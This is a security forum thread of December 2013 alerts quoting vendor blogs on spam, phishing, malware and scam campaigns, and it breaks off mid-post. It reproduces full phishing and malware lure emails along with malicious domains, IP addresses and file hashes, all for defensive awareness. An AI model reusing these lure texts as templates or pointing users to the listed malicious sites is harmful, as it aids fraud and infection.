- http://blog.malwarebytes.org/fraud-scam/2013/12/tech-support-scammers-spam-youtube-with-robot-like-warnings/
Dec 12, 2013 - "... In a twisted new variant, crooks are calling out to all antivirus / anti-malware customers and urging them to fix their computers now. One such account was spamming -YouTube- with hundreds of videos, all using a computer-generated voice and personalized for each AV/Anti-Malware company:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/vendors.png
... The company behind this scam is “My Tech Gurus” (http ://www.mytechgurus .com):
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/website.png
Once on the phone, I am quickly directed to a remote technician and instructed to hang the call to pursue the support session directly through the chat window on my computer:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/chatsession1.png
... If the ‘technician’ were honest, she would tell me there is absolutely nothing wrong with this computer... Instead she wastes no time in making up fake errors... here is the ‘technical’ explanation:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/thedetails.png
Of course, fixing those ‘errors’ is not going to be free:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/pay.png
... most of their website’s traffic comes from… India:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/india.png
... we encourage everyone to report each incident. We have created a guide* for victims that describes the variations of scams and what to do in each case. It may seem like a never-ending battle, but at the end of the day, if we’ve managed to save even just one person, then we can feel confident we’re doing the right thing..."
* http://blog.malwarebytes.org/tech-support-scams/
___

Fake FedEx SPAM - Malware Emails
- http://www.hoax-slayer.com/fedex-shipping-confirmation-malware-email.shtml
Dec 12, 2013 - "Email purporting to be from delivery company FedEx claims that a package delivery could not be completed because important information was missing. Recipients are instructed to click a link to verify their identity or risk having the package returned to sender... invites users to download "verification manager" software. If downloaded and run, the bogus "verification manager" will install malware on the user's computer:
From: FedEx UK
Subject: Package for you
SHIPPING CONFIRMATION
Dear [email address removed]
We have a package for you!
Unfortunately some important information is missing to complete the delivery.
Please follow the link to verify your identity:
verify your identity now!
You have 24 hours to compleate the verification! Otherwise the package will be returned to sender!
Order confirmation number: 56749951703
Order date: 03/12/2013
Thank you for choosing FedEx...
> http://www.hoax-slayer.com/images/fedex-verify-identity-malware-1.jpg
... Those who fall for the ruse and click the link will be taken to a -bogus- website tricked up to resemble a genuine FedEx webpage. Once on the page, they will be instructed to download and install a piece of software called the "FedEx Verification Manager", as shown in the following screenshot:
> http://www.hoax-slayer.com/images/fedex-verify-identity-malware-2.jpg
... following the instructions will not install a verification manager as claimed. Instead, it will install a trojan on the victim's computer..."
___

Spam Campaign delivers Liftoh Downloader
- http://www.secureworks.com/cyber-threat-intelligence/threats/spam-campaign-delivers-liftoh-downloader/
12/12/13 - "... researchers analyzed an ongoing spam campaign that uses the "UPS delivery notification tracking number" lure to infect unsuspecting users. While UPS-related spam emails are common, this particular campaign has been observed since October 2013 and uses exploit-laden documents to deliver its payload. The initial delivered payload is the Liftoh downloader trojan, which in turn downloads additional malware as a secondary payload onto the victim's system... the spam email containing a link to a malicious "Rich Text Format" (RTF) file. The malicious RTF is attached to the email, disguised as a .doc file.
> http://www.secureworks.com/assets/image_store/png/page.intelligence.threats.liftoh.1.png
... The spoofed sender is <auto-notify @ ups . com> or <auto @ ups . com>, but the headers reveal some of the actual senders (see Table 1). Some of the hosts listed in Table 1 may have appeared in DNS blacklisting lists such as SpamhausDBL, PSBL, SURBL, and SORBS, and some hosts are offline as of this publication. These hosts might have been compromised and used for SMTP relays, or could be part of a “use-and-throw” attacker-owned spam infrastructure... researchers observed the following domains in spam recipient email addresses:
gicom . nl
mvdloo . nl
cneweb . de
yahoo . fr
helimail . de
online . fr
tq3 . co. uk
excel . co. jp
smegroup . co . uk
fujielectric . co . jp
st-pauls . hereford . sch . uk
The RTF file contains exploits for patched vulnerabilities CVE-2012-0158 (MSCOMCTL.OCX RCE vulnerability) and CVE-2010-3333 (RTF stack buffer overflow vulnerability). Opening the RTF file drops and launches an empty document file in the user's %TEMP% folder with filename "cv.doc". Successful execution of the exploit code drops the Liftoh downloader malware onto the victim's system. This malware was observed spreading via Skype and other instant messenger applications in May 2013. Liftoh also downloaded the Phopifas worm as a secondary payload... event monitoring shows organizations in the following market verticals have been affected by Liftoh:
Banking
Manufacturing
Healthcare
Legal
Credit unions
Retail
Technology providers
... It is very likely that the threat actors will switch to other delivery mechanisms in the future that use social engineering techniques to maximize infection yields. It is also likely that the threat actors may leverage the Liftoh downloader to deliver a variety of other malware as secondary payloads..."
(More detail at the secureworks URL above.)
___

64-bit ZeuS - enhanced with Tor - banking malware
- https://www.securelist.com/en/blog/208214171/The_inevitable_move_64_bit_ZeuS_has_come_enhanced_with_Tor
Dec 11, 2013 - "The more people switch to 64-bit platforms, the more 64-bit malware appears. We have been following this process for several years now. The more people work on 64-bit platforms, the more 64-bit applications that are developed as well. Sometimes these include some very specific applications, for example, banking applications... If someone wants to hack into an application like this and steal information, the best tool for that would also be a 64-bit agent. And what’s the most notorious banking malware? ZeuS, of course – the trendsetter for the majority of today’s banking malware... we spotted a 32-bit ZeuS sample maintaining a 64-bit version inside... Whatever the intentions were of the malware author that created this piece of ZeuS – be it a marketing ploy or the groundwork for some future needs – a pure 64-bit ZeuS does finally exist, and we can conclude that a new milestone in the evolution of ZeuS has been reached. Moreover, this sample has revealed that another distinct feature has been added to ZeuS functionality - ZeuS malware has the ability to work on its own via the Tor network with onion CnC domains, meaning it now joins an exclusive group of malware families with this capability."

:mad: :fear:

AplusWebMaster
2013-12-13, 19:30
FYI...

Fake Amazon order SPAM
- http://threattrack.tumblr.com/post/69880436154/amazon-com-order-confirmation-spam
Dec 13, 2013 - "Subjects Seen:
Your Amazon.com order HZ1517235
Typical e-mail details:
Good day,
Thank you for your order. We’ll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon.com.
Order Details
Order WD4202401 Placed on December 9, 2013
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon .com

Malicious File Name and MD5:
ORDER_JB46238.zip (765FD2406623781F6F9EB4893C681A5B)
ORDER_JB46238.exe (26E57BDE90B43CF6DAE6FD5731954C61)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/def8933618a1f5be4e260a22d0ae1c5a/tumblr_inline_mxr13wZhzU1r6pupn.png

Tagged: Amazon, Wauchos
___

Bitcoin stealing SPAM
- http://www.arbornetworks.com/asert/2013/12/bitcoin-alarm-bitcoin-stealing-spam/
Dec 12, 2013 - "The rise in Bitcoin values seems to have caused an equal increase of Bitcoin -spam- as malware authors attempt to make money off the many new market participants. One site that was spammed to me three times in one day is bitcoin-alarm .net. I ignored it the first two times, but they must have really wanted me to look at it, so who am I not to oblidge.
> http://www.arbornetworks.com/asert/wp-content/uploads/2013/12/btclogo-300x36.png
The site promises a tool to notify you of market changes by SMS, without ever mentioning any nefarious behaviour. YouTube videos teach you what Bitcoin is, and how to install this free tool. They even provide a link so you can donate to the author, although it appears no one has chosen to do so. This I have to download.
> http://www.arbornetworks.com/asert/wp-content/uploads/2013/12/AppScreenshot.png
The download BitcoinAlarm.exe (MD5: edfa12d4a454b0eb786bbe92050ab88a) had just 1 hit on VirusTotal* when I first scanned it... This free utility is nothing more than malware with very low detection rate being spammed to anyone that might have a Bitcoin sitting around. When I checked the domain with urlvoid it had zero ‘bad’ reports and was -not- blacklisted... On a recheck BitcoinAlarm.exe’s detection is up to 14 of 49 scanners, and the download link appears to return 404..."
* https://www.virustotal.com/en/file/3e032b8c58aa17811d74f92658196374c2b8e6670640c121582690dab00573a0/analysis/

82.221.129.16
- https://www.virustotal.com/en/ip-address/82.221.129.16/information/
___

Fake - Halifax Bank Phishing Scam
- http://www.hoax-slayer.com/halifax-third-party-intrusions-phishing.shtml
Dec 13, 2013 - "... The email is -not- from Halifax. Links in the message open a -fake- website that contains web forms designed to steal the recipient's account login details, credit card data and other personal information...
> http://www.hoax-slayer.com/images/halifax-intrusions-phishing-1.jpg
... According to this message, which purports to be from UK bank, Halifax, third party intrusions have been detected on the recipient's account and, as a result, the account has been limited for security reasons. Supposedly, to restore access, the account holder must confirm his or her identity and verify that the account has not been used for fraud. The email instructs the recipient to access a "validation form" by clicking a link... Halifax customers who fall for the lies in the scam email and click the link will be taken to a -fake- website designed to look like the real Halifax site and asked to login:
> http://www.hoax-slayer.com/images/halifax-intrusions-phishing-2.jpg
Next, they will be asked to provide name and contact information:
> http://www.hoax-slayer.com/images/halifax-intrusions-phishing-3.jpg
And, on a final form, they will be asked to provide their card details:
> http://www.hoax-slayer.com/images/halifax-intrusions-phishing-4.jpg
After the final form is completed, victims will be automatically redirected to the genuine Halifax website and, at least until the criminals begin using the stolen information, they may remain unaware that they have just been scammed. Using the information provided on the fake forms, the scammers can hijack genuine Halifax accounts, lock out their rightful owners and commit banking and credit card fraud. The bank has published information about Halifax phishing scams, including how to report any that you receive, on its website*..."
* http://www.halifax.co.uk/aboutonline/security/common-threats/phishing/

:fear: :mad:

AplusWebMaster
2013-12-14, 20:34
FYI...

Malware Spam uses Geolocation to Mass Customize Filename
- https://isc.sans.edu/diary.html?storyid=17222
Last Updated: 2013-12-14 15:16:44 UTC - " Malicious e-mails usually fall into two groups: Mass-mailed generic e-mails, and highly customized spear phishing attempts. In between these two groups fall e-mails that obviously do more to "mass customize" the e-mail based on information retrieved from other sources. E-mails that appear to come from your Facebook friends, or malware that harvests other social networks like Linkedin to craft a more personalized message... received one e-mail... falls into the third category. The sender went through the trouble to craft a decent personalized message, trying to make me install some Spyware. In this example, the e-mail advised me of a new "WhatsApp" message that may be waiting for me. The e-mail looks legit, and even ithe link is formed to make it look like a voicemail link with the little "/play" ending:
> https://isc.sans.edu/diaryimages/images/Screen%20Shot%202013-12-14%20at%209_48_56%20AM.png
... the executable you are offered as you download the emails. The downloaded file is a ZIP file, and the file name of the included executable is adjusted to show a phone number that matches the location of the IP address from which the e-mail is downloaded... anti-malware coverage is -bad- according to Virustotal [1]. Anubis doesn't show much interesting stuff here, but I wouldn't be surprised if the malware detected that it ran in an analysis environment [2]. Interestingly, it appears to pop up Notepad with a generic error message..."
[1] https://www.virustotal.com/en/file/39457d452107fc019d0ece92d7a5c0c8d00ac5bf8dc3bd2411b0ad90cbcae194/analysis/1387029444/
[2] http://anubis.iseclab.org/?action=result&task_id=15eb462c46d9b95f4ed4d2750b1a52b0a

A few variants...
- http://blog.dynamoo.com/2013/12/your-friend-has-just-sent-you-pic-spam.html
11 Dec 2013

- http://www.webroot.com/blog/blog/2013/11/22/fake-whatsapp-voice-message-notification-themed-emails-expose-users-malware/
Nov 22, 2013

:mad: :fear:

AplusWebMaster
2013-12-16, 15:49
FYI...

Bogus Firefox add-on joins PC's to botnet - drive-by malware
- http://krebsonsecurity.com/2013/12/botnet-enlists-firefox-users-to-hack-web-sites/
Dec 16, 2013 - "An unusual botnet that has ensnared more than 12,500 systems disguises itself as a legitimate add-on for Mozilla Firefox and forces infected PCs to scour Web sites for vulnerabilities that can be used to install malware... The botnet, dubbed “Advanced Power” by its operators, appears to have been quietly working since at least May 2013. It’s not clear yet how the initial infection is being spread, but the malware enslaves PCs in a botnet that conducts SQL injection attacks on virtually any Web sites visited by the victim... SQL injection attacks take advantage of weak server configurations to inject malicious code into the database behind the public-facing Web server. Attackers can use this access to booby-trap sites with drive-by malware attacks, or force sites to cough up information stored in their databases. Although this malware does include a component designed to steal passwords and other sensitive information from infected machines, this feature does not appear to have been activated on the infected hosts. Rather, the purpose of this botnet seems to be using the compromised Windows desktops as a distributed scanning platform for finding exploitable Web sites. According to the botnet’s administrative panel, more than 12,500 PCs have been infected, and these bots in turn have helped to discover at least 1,800 Web pages that are vulnerable to SQL injection attacks.
The fraudulent Firefox add-on:
> http://krebsonsecurity.com/wp-content/uploads/2013/12/sql-addon.png
The malicious code comes from sources referenced in this Malwar writeup* and this Virustotal** entry... On infected systems with Mozilla Firefox installed, the bot code installs a browser plugin called “Microsoft .NET Framework Assistant”... The malicious add-on then conducts tests nearly every page the infected user visits for the presence of several different SQL injection vulnerabilities..."
(More detail at the krebsonsecurity URL above.)
* https://malwr.com/analysis/MTI2YzFkODZkNzA0NDVkYTkzNDBmZTg5YjdkMjM3MDA/

- https://malwr.com/

** https://www.virustotal.com/en/file/19b523e0db7d612dd439147956589b0c7fe264f1eb183ea3a74565ad20d3cb8a/analysis/

- https://addons.mozilla.org/en-US/firefox/blocked/i508
Blocked on December 16, 2013...
"Microsoft .NET Framework Assistant (malware) has been blocked for your protection.
Why was it blocked?
This is -not- the Microsoft .NET Framework Assistant created and distributed by Microsoft. It is a -malicious- extension that is distributed under the same name to trick users into installing it, and turns users into a botnet that conducts SQL injection attacks on visited websites..."

- https://www.virustotal.com/en/ip-address/216.250.115.143/information/
2013-12-18
- http://google.com/safebrowsing/diagnostic?site=AS:8560
___

More Fake Amazon order SPAM ...
- http://www.hoax-slayer.com/amazon-order-details-malware.shtml
Dec 16, 2013 - "... The email is -not- from Amazon and the attached file does not contain order details. Instead, the attached .zip file harbours a malicious .exe file that, if opened, can install a trojan on the user's computer...
> http://www.hoax-slayer.com/images/amazon-order-details-malware-2013-1.jpg
... Amazon did -not- send the email and the attached .zip file does not contain order details as claimed. If opened, the .zip file reveals a .exe file. And, if users run this .exe file, a trojan may be installed on their computers... such trojans can harvest personal and financial information such as account login data from the compromised computer and send it to criminals waiting online. It may also allow the criminals to take control of the infected computer. The criminals hope that at least a few recipients, who have not made any recent Amazon orders, will be panicked into opening the attachment in the mistaken belief that a purchase has been made in their names... users who have recently bought items on Amazon might be tricked into opening the attachment in the belief that the file it contains pertains to their order..."
___

Bitcoin price hike spurs Malware, Wallet Theft
- http://blog.trendmicro.com/trendlabs-security-intelligence/bitcoin-price-hike-spurs-malware-wallet-theft/
Dec 16, 2013 - "The past few weeks have been rather exciting for Bitcoin owners and speculators, with prices peaking at over $1200 per BTC... This is giving rise to more Bitcoin-related threats. Victims are now being used either to “mine” Bitcoins; in addition the Bitcoin wallets of existing users are now tempting targets for theft as well. From September to November, feedback from the Smart Protection Network indicated that more than 12,000 PCs globally had been affected by Bitcoin-mining malware:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/12/bitcoin.jpg
... Bitcoin is promoted as being “anonymous”, but in a way nothing could be further from the truth. Because all Bitcoin transactions are public, it is possible to see all the transactions a user has made. Therefore, given enough circumstantial evidence, it may be possible to get the identity of a user... while Bitcoin may be a product of the 21st century, at the same time it is something that has been around for centuries – cash. The same caution and prudence that applies to handling cash should be applied here as well."
___

Google Play - suspicious apps leak Google Account IDs
- http://blogs.mcafee.com/mcafee-labs/suspicious-apps-on-google-play-leak-google-account-ids
Dec 16, 2013 - "The Google account ID (or account name), which in most cases is a Gmail address, is one of the key identifiers of -Android- device users. McAfee has confirmed a substantial amount of suspicious apps secretly collect Google account IDs on Google Play. In these cases, the corresponding Google account password is not collected, but leaking only IDs still poses a certain level of security and privacy risk. Two particular apps, one a dating service app and the other a fortune app, retrieve Google account IDs and send them to their web server just after they launch and without prior notice to users. The total number of downloads of each app is between 10,000 and 50,000...
> http://blogs.mcafee.com/wp-content/uploads/galeaker-1.png
Another set of suspicious apps, from various categories, shown in the figure below* secretly send a device’s Google account ID, IMEI, and IMSI to a single, shared remote web server just after launch and without any prior notice. The aggregate download count of this set of apps amounts to at least several million, probably because they are localized for many languages. It appears the main targets are Japanese users...
* http://blogs.mcafee.com/wp-content/uploads/galeaker-2.png
More than 30 suspicious apps leak Google account IDs, IMEI, and IMSI... We have not confirmed why the app developers secretly collect Google account IDs, or how they use them and how they manage the data securely. And we have not so far observed any malicious activities based on the stolen data. But at least these apps should notify users of the collection and of the intended use of their data–and give them opportunity to -decline- the data transfer. Android apps can retrieve Google account IDs with GET_ACCOUNTS permission granted at installation and by using one of the methods of the AccountManager class. This permission is often requested when an app uses the Google Cloud Messaging feature, which is a standard mechanism provided by Google to allow server-to-device push notification. As such, users cannot judge if granting this permission is really safe; some apps request this permission for GCM, but others for collecting account information for potentially malicious purposes...
A GET_ACCOUNTS permission request:
> http://blogs.mcafee.com/wp-content/uploads/galeaker-3e.png
... With the GET_ACCOUNTS permission granted, Android apps can also retrieve account names for services other than Google that have been registered in the device, including Facebook, Twitter, LinkedIn, Tumblr, WhatsApp, and so on. Users will face these same issues once these other account names are stolen... We strongly recommend that users review the privacy settings on all the services they employ and disable the “allow search by email address” option unless they really want it. Users should also -not- expose their account names..."

:fear::fear: :mad:

AplusWebMaster
2013-12-18, 00:20
FYI...

Video: Parcel Reshipping Scams, Parcel Mules and Fake Job Offers
- http://blog.dynamoo.com/2013/12/video-parcel-reshipping-scams-parcel.html
17 Dec 2013 - "A brief presentation on how parcel reshipping scams work, and the role of parcel mules and fake job offers..."
(See the dynamoo URL above for the video.)

:mad: :fear: :sad:

AplusWebMaster
2013-12-18, 16:12
FYI...

Malvertising campaign leads to Browser-Locking Ransomware
- http://www.symantec.com/connect/blogs/massive-malvertising-campaign-leads-browser-locking-ransomware
17 Dec 2013 - "The Browlock ransomware (Trojan.Ransomlock.AG) is probably the simplest version of ransomware that is currently active. It does not download child abuse material, such as Ransomlock.AE, or encrypt files on your computer, like Trojan.Cryptolocker. It does not even run as a program on the compromised computer. This ransomware is instead a plain old Web page, with JavaScript tricks that prevent users from closing a browser tab. It determines the user’s local country and makes the usual threats, claiming that the user has broken the law by accessing pornography websites and demands that they pay a fine to the local police.
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Browlock%201%20edit.png
What is substantial is the number of users getting redirected to the Browlock website. In November, Symantec blocked more than 650,000 connections to the Browlock website. The same trend continues in December. More than 220,000 connections were blocked just 11 days into December. Overall, about 1.8 million connections have been blocked since tracking began in September. These numbers may not seem particularly large for those familiar with exploit kits and traffic redirection systems, but they solely represent users of Symantec products. The 650,000 connections detected in November is merely a piece of the pie, but the real number is likely to be much larger.
Browlock ransomware’s activity in November and December this year
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Browlock%202.png
... The Browlock attackers appear to be purchasing traffic that redirects many different visitors to their malicious website. They are using malvertising, an increasingly common approach which involves purchasing advertising from legitimate networks. The advertisement is directed to what appears to be an adult Web page, which then redirects to the Browlock website... In a recent example, the attackers created several different accounts with an advertising network, deposited payment, and began buying traffic to redirect users to a website with a name that resembles an online chat forum. When the user visits the page, they are then redirected to the Browlock site. In fact, the attacker hosts the legitimate-looking domain name on the same infrastructure as the ransomware site itself... Symantec has identified 29 different law enforcement values, representing approximately 25 regions. The following graph shows the percentage of connections for the top ten law enforcement agencies identified. We found that traffic from the US was the most common. This is followed by Germany, then Europol, which covers European countries when no specific image template has been created.
Top ten regions targeted by Browlock
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Browlock%203.png
... We have seen 196 domains since tracking began. The domains adhere to the format of a single letter followed by four digits and then .com. The actual domains have been hosted on a number of different IP addresses over the past four months. The most active Autonomous System (AS) has been AS48031 - PE Ivanov Vitaliy Sergeevich, which was used in each of the past four months. The attackers rotated through seven different IP addresses in this AS. The Browlock ransomware tactic is simple but effective. Attackers save money by -not- using a malicious executable or accessing an exploit kit. As the victim simply needs to close their browser to escape from the Web page, one might think that no one will pay up. However, the Browlock attackers are clearly spending money to purchase traffic and so they must be making a return on that investment. The usual ransomware tactic of targeting users of pornographic websites continues to capitalize on a victim’s embarrassment and may account for the success rate...
Malicious infrastructures used:
AS24940 HETZNER-AS Hetzner Online AG*
IP address: 144.76.136.174 Number of redirected users: 2,387
AS48031 – PE Ivanov Vitaliy Sergeevich
IP address: 176.103.48.11 Number of redirected users: 37,521
IP address: 193.169.86.15 Number of redirected users: 346
IP address: 193.169.86.247 Number of redirected users: 662,712
IP address: 193.169.86.250 Number of redirected users: 475,914
IP address: 193.169.87.14 Number of redirected users: 164,587
IP address: 193.169.87.15 Number of redirected users: 3,945
IP address: 193.169.87.247 Number of redirected users: 132,398
AS3255 –UARNET
IP address: 194.44.49.150 Number of redirected users: 28,533
IP address: 194.44.49.152 Number of redirected users: 134,206
AS59577 SIGMA-AS Sigma ltd
IP address: 195.20.141.61 Number of redirected users: 22,960
Nigeria Ifaki Federal University Oye-ekiti
IP address: 196.47.100.2 Number of redirected users: 47,527
AS44050 - Petersburg Internet Network LLC
IP address: 91.220.131.106 Number of redirected users: 81,343
IP address: 91.220.131.108 Number of redirected users: 75,381
IP address: 91.220.131.56 Number of redirected users: 293
AS31266 INSTOLL-AS Instoll ltd.
IP address: 91.239.238.21 Number of redirected users: 8,063 "

Diagnostic page for AS24940 (HETZNER-AS)
* http://google.com/safebrowsing/diagnostic?site=AS:24940
"... over the past 90 days, 4337 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-12-18, and the last time suspicious content was found was on 2013-12-18... Over the past 90 days, we found 683 site(s)... appeared to function as intermediaries for the infection of 1634 other site(s)... We found 514 site(s)... that infected 5040 other site(s)..."

Diagnostic page for AS48031 (XSERVER-IP-NETWORK-AS)
- http://google.com/safebrowsing/diagnostic?site=AS:48031
"... over the past 90 days, 178 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-12-18, and the last time suspicious content was found was on 2013-12-18... Over the past 90 days, we found 25 site(s) on this network... appeared to function as intermediaries for the infection of 120 other site(s)... We found 16 site(s)... that infected 779 other site(s)..."
___

Fake ‘WhatsApp Missed Voicemail’ emails lead to pharmaceutical scams
- http://www.webroot.com/blog/2013/12/18/fake-whatsapp-missed-voicemail-themed-emails-lead-pharmaceutical-scams/
Dec 18, 2013 - "... A currently circulating fraudulent spam campaign is brand-jacking WhatsApp in an attempt to trick its users into clicking on links found in the email. Once socially engineered users fall victim to the scam, they’re automatically exposed to a fraudulent pharmaceutical site, offering them pseudo bargain deals...
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/12/WhatsApp_Fake_Rogue_Fraudulent_Email_Spam_Pharma_Pharmaceutical_Scam_01.png
Sample screenshot of the landing pharmaceutical scam page:
> https://www.webroot.com/blog/wp-content/uploads/2013/12/WhatsApp_Fake_Rogue_Fraudulent_Email_Spam_Pharma_Pharmaceutical_Scam-1024x587.png
Redirection chain: hxxp :// 203.78.110.20 /horizontally.html -> hxxp ://viagraphysician .com (109.201.133.58). We’re also aware of... fraudulent domains that are known to have phoned back to the same IP (109.201.133.58)... Name servers:
ns1 .viagraphysician .com – 178.88.64.149
ns2 .viagraphysician .com – 200.185.230.32
... fraudulent name servers are also known to have participated in the campaign’s infrastructure at 178.88.64.149 ... We expect that more legitimate brands will continue getting targeted in such a way, with the fraudsters behind the campaign continuing to earn revenue through pharmaceutical affiliate programs..."
(More detail at the webroot URL above.)

- https://www.virustotal.com/en/ip-address/109.201.133.58/information/

- https://www.virustotal.com/en/ip-address/178.88.64.149/information/

- https://www.virustotal.com/en/ip-address/200.185.230.32/information/

- https://www.virustotal.com/en/ip-address/203.78.110.20/information/
___

Gmail’s Image Display defaults may change your Privacy
- http://blog.trendmicro.com/trendlabs-security-intelligence/changes-to-gmails-image-display-defaults-may-change-your-privacy/
Dec 18, 2013 - "... this means that all pictures in emails will now be automatically displayed. Instead of being served directly from the site hosting the image, however, they will be given a copy that has been scanned by Google. Officially, the stated rationale for this change is that previously, senders “might try to use images to compromise the security of your computer”, and that with the change images will be “checked for known viruses or malware”. This change affects users who access Gmail via their browser, or the official iOS and Android apps. In the past, there have been occasions where malicious images were used to compromise computers. A number of image formats were exploited in 2005 and 2006, including a Windows Metafile vulnerability (MS06-001), and an Office vulnerability that allowed arbitrary code execution (MS06-039). More recently, a vulnerability in how TIFF files were handled (MS13-096) was found and not patched until the December Patch Tuesday cycle. Properly implemented, scanning the images would be able to prevent these attacks from affecting users... actual exploitation of these vulnerabilities has been relatively uncommon. Exploit kits have opted to target vulnerabilities in Flash, Internet Explorer, Java, and Reader instead. Image vulnerabilities are not even listed in the control panels of these kits. The primary reason to block images is not to block malware, but to stop information leakage. Images are used by spammers and attackers to track if/when email has been read and to identify the browser environment of the user. Email marketers also use this technique to check how effective their email campaigns are. Email marketers have already confirmed that in spite of Google’s moves, email tracking is still very possible. Google’s proposed solution (a web proxy that checks images for malware images) appears to solve a small security problem (malicious image files), while leaving at risk user’s security and privacy. Attackers still have the capability to track that users have read email–and to learn aspects of their browser environment. Users can still revert to the previous behavior via their Gmail settings, as outlined in Google’s blog post:
Of course, those who prefer to authorize image display on a per message basis can choose the option “Ask before displaying external images” under the General tab in Settings. That option will also be the default for users who previously selected “Ask before displaying external content”.
We -strongly- recommend that users -change- this setting for their accounts. Users who access Gmail via POP3 or IMAP should check the settings of their mail application to control the display of images."
___

Fake VISA Report SPAM / payment-history-n434543-434328745231.zip
- http://blog.dynamoo.com/2013/12/visa-recent-transactions-report-spam.html
18 Dec 2013 - "This -fake- VISA spam comes with a malicious attachment:
Date: Wed, 18 Dec 2013 14:32:50 -0500 [14:32:50 EST]
From: Visa [Eddie_Jackson@ visa .com]
Subject: VISA - Recent Transactions Report
Dear Visa card holder,
A recent review of your transaction history determined that your card was used in
possible fraudulent transactions. For security reasons the requested transactions were
refused. Please carefully review electronic report for your VISA card.
For more details please see the attached transaction report.
Virgie_Cruz
Data Protection Officer
VISA EUROPE LIMITED
1 Sheldon Square
London W2 6WH
United Kingdom ...

Attached to the message is an archive file payment-history-n434543-434328745231.zip with a VirusTotal detection rate of 10/48*, which in turn contains payment-history-n434543-434328745231.exe with a detection rate of 10/49**. Automated analysis tools... indicate a network connection to bestdatingsitesreview4u .com on 38.102.226.126 (PSInet, US). This appears to be the only site on that server, blocking either the IP or domain temporarily may help mitigate against infection."
* https://www.virustotal.com/en/file/fd5451a5d4731ae279fcc5cdad37ec4f76e81957f9be643fd0934d67cba387ac/analysis/1387397621/

** https://www.virustotal.com/en/file/c7172701eeb5bfaa15acf865a6ff80b2c01fc437072f644b768386a23f262127/analysis/1387397396/

- https://www.virustotal.com/en/ip-address/38.102.226.126/information/

:mad: :fear: :sad:

AplusWebMaster
2013-12-19, 19:20
FYI...

Fake Voicemail SPAM - from "Elfin Cars Sports"
- http://blog.dynamoo.com/2013/12/new-voicemail-message-from-elfin-cars.html
19 Dec 2013 - "This -fake- voicemail message from "Elfin Cars Sports" has a malicious attachment:
Date: Thu, 19 Dec 2013 08:36:56 -0600 [09:36:56 EST]
From: Voice Mail [noreply@ spamcop .net]
Subject: New Voicemail Message
New Voicemail Message
You have been left a 1:02 long message (number 1) in mailbox from "Elfin Cars Sports"
07594434593, on Thursday, December 19, 2013 at 07:20:02 AM
The voicemail message has been attached to this email - which you can play on most
computers...

The attachment is VoiceMail.zip with a VirusTotal detection rate of 9/49*, which in turn contains a malicious executable VoiceMail.exe with an icon to make it look like an audio file, and this has a also detection rate of 9/49** (but with slightly different detections). Automated analysis tools... show an attempted connection to plantautomation-technology .com on 216.151.164.211 (NJ Tech Solutions, US) and anuudyog .com on 66.7.149.156 (Web Werks, US)."
* https://www.virustotal.com/en-gb/file/c9705f38f51fa419ec3f59421aeee7f27c89b7b45a5088c141326f19adc0480a/analysis/1387465669/

** https://www.virustotal.com/en-gb/file/d2e63c058e914b511d6f33960f0a031d623fb83341dd4c0cfec555de732e44bf/analysis/1387465683/
___

Fake Navy Federal Credit Union Phish
- http://threattrack.tumblr.com/post/70485890383/navy-federal-credit-union-phish
Dec 19, 2013 - "Subjects Seen:
NAVY FEDERAL Credit Union
Typical e-mail details:
We recently reviewed your account, and we suspect an unauthorized ATM-based transactions on your account access. Our banking service will help you to avoid frequently fraud transactions and to keep your savings and investments confidential.
To ensure that your account is not compromised please login to NAVY Account Access by clicking this link, verify and update your profile and your current account access will be 128-bit encrypted and guard by our security system.
- Click Here to login your Federal Credit Union Account
- Enter your Account Access details
- Verify and update with NAVY FEDERAL
Thank you for using F.C.U Account Access Security

Malicious URLs:
holidayindingle .com/wp-admin/css/colors/blue/gos/
80.93.29.195
- https://www.virustotal.com/en/ip-address/80.93.29.195/information/

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/60c69283a087981d79c8ee5168829d36/tumblr_inline_my234zcEAF1r6pupn.png

Tagged: Navy Federal Credit Union, phish
___

AT&T Voicemail Message Spam
- http://threattrack.tumblr.com/post/70498350698/at-t-voicemail-message-spam
Dec 19, 2013 - "Subjects Seen:
AT&T - You Have a new Voice Mail
Typical e-mail details:
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
The length of transmission was 25 seconds.
Thank you,
AT&T Online Services

Malicious File Name and MD5:
VoiceMail.zip (BE7D2F4179D6D57827A18A20996A5A42)
VoiceMail.exe (D1CA2DC1B6D1C8B32665FCFA36BE810B)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/6d1b214f58019207207945b6f0c1372d/tumblr_inline_my2cl9aSPC1r6pupn.png

Tagged: AT&T, Upatre
___

Fake emails regarding license key from Adobe - trojan
- http://blog.mxlab.eu/2013/12/19/trojan-attached-in-fake-emails-regarding-license-key-from-adobe/
Dec 19, 2013 - "... new trojan distribution campaign by email with the following subjects:
Download your adobe software
Download your license key
Thank you for your order
Your order is processed
This email is send from the spoofed address “Adobe Software <soft@ adobes .com>”, “Adobe Software <support@ adobes .com>”, “Adobe <software@ adobes .com>”, “Adobe Software <your_order@ adobes .com>” or similar and has the following body:
Hello.
Thank you for buying Director 11.5 software.
Your Adobe License key is in attached document below.
Adobe Systems Incorporated.
Hello.
Thank you for buying Creative Suite 6 Master Collection software.
Your Adobe License key is in attached document below.
Adobe Systems Incorporated.
Order Notification.
Thank you for buying Adobe Connect software.
Your Adobe License key is in attached document below.
Adobe Systems Incorporated.
